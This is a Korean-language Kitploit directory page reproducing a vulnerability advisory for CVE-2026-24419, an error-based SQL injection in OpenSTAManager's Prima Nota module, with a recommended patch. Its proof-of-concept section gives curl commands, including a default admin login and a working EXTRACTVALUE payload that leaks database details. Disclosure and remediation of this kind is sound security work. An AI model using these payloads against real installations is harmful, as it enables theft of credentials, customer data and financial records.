Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24419 — CVE-2026-24419 - OpenSTAManager의 Prima Nota 모듈에 SQL 인젝션 취약점이 있습니다. | Kitploit
도구/GitHubGitHub/lukasz-rybak/cve-2026-24419
Vulnerability AnalysisWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHublukasz-rybak/cve-2026-24419

CVE-2026-24419

CVE-2026-24419 - OpenSTAManager의 Prima Nota 모듈에 SQL 인젝션 취약점이 있습니다.

저장소 보기
25개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24419: OpenSTAManager의 Prima Nota 모듈에서 SQL 인젝션 취약점 발견

개요

필드세부 정보
CVE IDCVE-2026-24419
심각도높음(HIGH)
보안 권고보안 권고 보기
발견자Lukasz Rybak

영향을 받는 제품

  • devcode-it/openstamanager (버전: <= 2.9.8)

CWE 분류

  • CWE-89: SQL 명령에 사용되는 특수 요소의 부적절한 중화('SQL 인젝션')

세부 정보

요약

OpenSTAManager v2.9.8의 Prima Nota(분개장) 모듈에서 발견된 심각한 오류 기반 SQL 인젝션 취약점으로, 인증된 공격자가 URL 파라미터에 악성 SQL을 주입하여 XML 오류 메시지를 통해 사용자 자격 증명, 고객 PII, 재무 기록을 포함한 전체 데이터베이스 내용을 추출할 수 있습니다.

상태: ✅ 실제 인스턴스(v2.9.8)에서 확인 및 테스트 완료 취약한 파라미터: id_documenti (GET 파라미터) 영향을 받는 엔드포인트: /modules/primanota/add.php 공격 유형: 오류 기반 SQL 인젝션(IN 절)

세부 설명

OpenSTAManager v2.9.8에는 Prima Nota(분개장) 모듈의 add.php 파일에 심각한 오류 기반 SQL 인젝션 취약점이 존재합니다. 이 애플리케이션은 GET 파라미터에서 쉼표로 구분된 값들이 SQL IN() 절에 사용되기 전에 정수인지 검증하지 않아, 공격자가 임의의 SQL 명령을 주입하고 XPATH 오류 메시지를 통해 민감한 데이터를 추출할 수 있습니다.

취약점 공격 체인:

  1. 진입점: /modules/primanota/add.php (63-67행)

    root@kitploit:~
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    

    영향: get() 함수는 사용자가 제어하는 URL 파라미터를 검색하며, explode(',', (string) ...)는 이를 쉼표로 분리하지만 요소가 정수인지 확인하는 검증이 전혀 없습니다.

  2. SQL 인젝션 지점: /modules/primanota/add.php (306행)

    root@kitploit:~
    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
    

    영향: $id_documenti의 배열 요소는 타입 검증이나 prepare() 없이 implode()를 사용해 직접 연결되어 완전한 SQL 인젝션이 가능합니다.

근본 원인 분석:

취약점은 다음 이유로 존재합니다:

  1. get('id_documenti')는 사용자가 제어하는 문자열을 반환합니다.
  2. explode(',', (string) $value)는 쉼표로 분리하지만 타입을 검증하지 않습니다.
  3. implode(',', $array)는 배열 요소를 SQL에 직접 연결합니다.
  4. 배열 요소가 정수인지 검증하는 코드가 없습니다.
  5. 공격자는 ?id_documenti=1) AND EXTRACTVALUE(...) %23를 제공하여 SQL을 주입할 수 있습니다.

영향을 받는 코드 경로:

root@kitploit:~
GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
  ↓
add.php:63 - $id_documenti = get('id_documenti')
  ↓
add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION]
  ↓
add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]

PoC

1단계: 로그인

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

2단계: 취약점 확인 (오류 기반 SQL 인젝션)

테스트 1: 데이터베이스 사용자 및 버전 추출

root@kitploit:~
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

응답 (공격자에게 노출되는 오류 메시지):

root@kitploit:~
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
이미지

영향

Prima Nota(분개장) 모듈에 접근할 수 있는 모든 인증된 사용자.

권장 수정 사항

1차 수정 - 타입 검증:

파일: /modules/primanota/add.php

수정 전 (취약한 코드 - 63-67행):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

수정 후 (패치됨):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
// Validate that all array elements are integers
$id_documenti = array_map('intval', $id_documenti);
$id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

크레딧

발견자: Łukasz Rybak

참고 자료

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24419
  • https://github.com/advisories/GHSA-4j2x-jh4m-fqv6

고지 사항

이 CVE는 조정된 취약점 공개 절차에 따라 책임감 있게 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 사용됩니다.

도구 다운로드